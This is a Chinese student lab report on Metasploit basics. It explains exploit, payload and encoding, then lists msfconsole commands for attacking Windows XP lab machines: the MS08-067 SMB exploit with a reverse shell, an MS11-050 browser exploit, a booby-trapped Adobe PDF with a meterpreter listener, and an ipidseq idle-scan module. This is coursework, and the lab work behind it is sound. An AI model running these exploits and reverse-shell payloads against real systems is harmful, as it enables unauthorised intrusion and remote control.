20155318 《网络攻防》Exp5 MSF基础应用

20155318 《网络攻防》Exp5 MSF基础应用

基础问题

• 用自己的话解释什么是exploit,payload,encode？
• exploit就相当于是载具，将真正要负责攻击的代码传送到靶机中
• payload也就相当于载荷，相当于我们之前实验的后门，exploit把它传送到靶机中后，它就负责执行相应的攻击代码。
• encode也就是编码，主要是为了避免payload中坏字符影响功能，其次是为了伪装，不让杀毒软件很轻易的就发现payload是攻击代码。

实验步骤

Windows服务渗透攻击——MS08-067安全漏洞

• 攻击机：kali，ip：192.168.153.129
• 靶机：windows XP SP3(English)，IP地址是192.168.153.130
• 在kali输入msfconsole进入控制台后依次输入以下指令：

use exploit/windows/smb/ms08_067_netapi
set payload generic/shell_reverse_tcp//tcp反向回连
set LHOST 192.168.153.129//此IP是kali的IP
set LPORT 5318//端口
set RHOST 192.168.153.130//此IP是靶机WIN XP的IP，特定漏洞端口已经固定
set target 0
exploit//进行攻击

• 

• 建立会话，攻击结果如下：

• 

针对浏览器的攻击：MS11-050

• 攻击机：kali，IP地址是192.168.153.129
• 靶机：Windows XP Professional SP3 简体中文，IP地址是192.168.153.131
  
  在攻击机kali输入msfconsole进入控制台，依次输入以下指令：

msf > use windows/browser/ms11_050_mshtml_cobjectele
msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回连
msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.153.129 //攻击机ip
msf exploit(ms11_050_cobjectelement) > set LPORT 5318 //攻击端口固定
msf exploit(ms11_050_cobjectelement) > set URIPATH 5318lxy //统一资源标识符路径设置
msf exploit(ms11_050_cobjectelement) > exploit

• 在靶机访问http://192.168.153.129:8080/5318lxy

• 

• 会提示windows为了保护计算机已经关闭此程序

• 

• 将internet选项中和安全有关的都降级、关闭，允许运行和安装软件

• 

• 再次访问，还是失败

• 

针对客户端的攻击：adobe_toolbutton

• 攻击机：kali，ip：192.168.153.129

• 靶机：Windows XP Professional SP3 简体中文，IP地址是192.168.153.131

• 在msf下用search

• 

• 依次输入以下指令：

msf > use windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp反向回连
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.153.129 //攻击机ip
msf exploit(adobe_cooltype_sing) > set LPORT 5318 //攻击端口
msf exploit(adobe_cooltype_sing) > set FILENAME exp5_5318.pdf //设置生成pdf文件的名字
msf exploit(adobe_cooltype_sing) > exploit //攻击

• 成功生成exp5_5318.pdf:

• 

• 

• 将pdf文件传送或拷贝到靶机上后，在kali上输入back退出当前模块，进入监听模块，输入以下命令：

msf > use exploit/multi/handler //进入监听模块
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接
msf exploit(handler) > set LHOST 192.168.153.131 //攻击机ip
msf exploit(handler) > set LPORT 5318 //攻击端口固定
msf exploit(handler) > exploit

• 然后在靶机上打开20155312.pdf文件

• 

• 运行后，回连成功

• 

• 运行ipconfig命令

• 

• 靶机关闭pdf文件，主机失去权限

• 

应用任何一个辅助模块：ipidseq

ipidseq

• 功能：扫描网段中的存活ip，它会识别被发现主机的IPID（用于跟踪IP包的次序的一种技术）序列模式，并且表示出哪些是0、随机或递增的。

• 拥有递增的IPID的空闲（空闲是指该主机在特定时间内不向网络发送数据包）主机（即显示为Incremental!的条目），不会被网络上的其它主机严重影响，可以用来进行TCP空闲扫描。

• TCP空闲扫描：是一种高级的nmap扫描方式，这种扫描方式能让我们冒充网络上另一台主机的IP地址对目标进行更为隐秘的扫描。

• 具体流程

• 攻击机：kali，IP地址是192.168.153.132

• 靶机：Windows XP Professional SP3 简体中文，IP地址是192.168.153.131

• use auxiliary/scanner/ip/ipidseq

• 查看需要设置的参数，设置完成后确认一下，然后就可以开始exploit了。

• 

• 设为对单一目标主机的扫描

• 

• 

• 对指定网段的主机进行扫描：

• 

实验总结

• 本次实验我学会了MSF工具的一些常用指令，了解六个模块用法，整体实验流程并不复杂，但是使用浏览器的那个攻击我没有成功，尝试了其他多种方法也不行，打算等假期结束后再继续尝试。
• 离实战还缺些什么技术或步骤？
• 目前都只是针对XP系统进行攻击，还不能直接对现在的操作系统进行攻击，但是攻击原理应该是相同的。